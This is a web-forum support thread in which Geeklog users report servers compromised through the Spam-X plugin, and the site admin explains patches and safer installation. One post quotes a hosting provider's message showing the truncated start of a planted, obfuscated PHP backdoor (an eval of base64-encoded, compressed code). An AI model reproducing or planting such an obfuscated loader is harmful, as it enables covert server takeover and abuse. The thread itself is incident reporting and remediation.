04/06/07 02:24pm  

Rictor

Anonymous
The file spamx/BlackList.Examine.class.php was being maliciously exploited to start up irc clients and plant other malicious php files on my server. I just upgrade from 1.4.0 to the latest version of Geeklog after deleting the malicious files, and I was wondering if this exploit was corrected in the new version or not? A quick search of Google found that the exploit is being discussed on several hacking sites.
 04/06/07 02:39pm  
Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
This issue was fixed with the release of Geeklog 1.4.0sr4 on June 30th, 2006.

It only affected incorrectly installed Geeklog setups. Which, as we have learned since, includes pretty much every install that was done using auto-installers such as Fantastico.

As usual, we suggest that Geeklog users subscribe to our (low traffic) geeklog-announce mailing list to be informed about new releases and security issues.

bye, Dirk
 04/18/09 04:44pm  

BMcDonald

Anonymous
Hi,

I just got a notice form my provider that this exploit happened on my system. I'm running 1.4.1, and I I think I did do the upgrade with fantasico.

I've read some problems with upgrading spamx. I'm running 1.1.0

Would it make more sense to just uninstall that version and install the latest one fresh? I found a 1.3.9 version, but saw a post the said there's a 1.5.2 version. Any idea where that one is?

Thanks
 04/18/09 04:55pm  
Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
The latest version of Geeklog can always be downloaded from here. You can update your Fantastico install with this version - just make sure to run the install script in upgrade mode (see the installation instructions for details).

bye, Dirk
 10/13/09 04:11pm  

radu

Anonymous
I did an upgrade and my spamx was corupted letting hakkers to send thousands of Email out I also got penalized with $250 for one of my IP's that was blacklisted. Is Spamx safe or not? can the site run without?

this is the message i got from my server provider:


http://cluj-napoca.com/plugins/spamx/home.php

that is NOT a standard thing installed by Fantastico and the
entire home.php page is obfuscated php designed specifically to hide what it
does.

Text Formatted Code

root@hosting [/home/master/public_html/plugins/spamx]# head home.php
<? eval
(gzinflate(base64_decode("vRr9V9u29udxTv8HTWPgNOQT6FYSp+sorN0bpSts77zT9nAUW0k0HDu1ZCBr+d/fvZJsK4lDaV/f/AOxdD91db8k82BDjDwhJVfe5sWr07PzN9ssUCKJt9+RGql9eLCxacb+MrgHoCmXko15AbNjA+RTJqJISFWAixmDMEqTaQHDgZlO+Syaq6SA2LEBymz4Fw9KlnacU7IoZlPukJoJK09E/GIBjjMGFiSx4rFS81kJdeY00oMNYp984cQnWRrxOEhC7uWTtV4lIk/5+ALXwgLu0e/3D7/vdukOoebnE8QgJeT3kSJVKmYyYnLCZTWutdgKrp1H3Ftc65PBg43+RE0j+CX9CWchvpC+Eirig03y6vkrcsKkhD9gxZRs9lsGpLG+bTTIr5lU5EzNI068n/lYxDXSaBiw1LPa2lTxG9UKpKQaRIZJOCcfjMJDFlyO0ySLw0aQREl68F1bP3Y9I9igxohNRTQ/uOJpyGLmQqT4mx90OnaqYDAaFQxu9Y+IZ5laL/LYPBUy/7y3TEdpIxMXzcA9PyW2QipLBYu+RCaZpTyXt95097Rav6X3sHq3j+Kwpjcb0LTnEI2mt3Y41jx9u0BtCd8KIJGIL4sBWxhduSPjKv
.....
 


That is not what normal code is supposed to look like.
 10/13/09 04:27pm  
Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
embarrassed
Ouch - there's an embarrassing bug in our inclusion protection for some of the Spam-X modules, so that old exploit still works Oops! Sorry about that. We'll get that fixed ASAP.

In the meantime, please fix your installation: You should not put the plugins directory into the web root (as stated in the installation instructions). If you can't put it outside of the webroot, please follow the instructions here.

bye, Dirk